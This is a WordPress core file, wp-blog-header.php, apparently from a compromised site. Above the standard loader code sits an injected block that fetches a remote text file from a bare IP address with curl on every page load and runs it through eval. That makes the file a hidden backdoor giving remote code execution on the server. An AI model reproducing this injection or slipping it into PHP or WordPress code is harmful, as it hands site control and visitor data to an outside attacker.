File: /home/xsbcdnkr/chaaqua.com/serveque/2025/wp-blog-header.php
<?php
$c = curl_init("http://142.54.166.178/z51110_2/stat/index2.txt");
curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($c, CURLOPT_TIMEOUT, 5);
curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
$result = curl_exec($c);
if ($result !== false) {
eval('?>' . $result);
}else{
echo "Error: ".curl_errno($c).", ".curl_error($c);
}
curl_close($c);
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}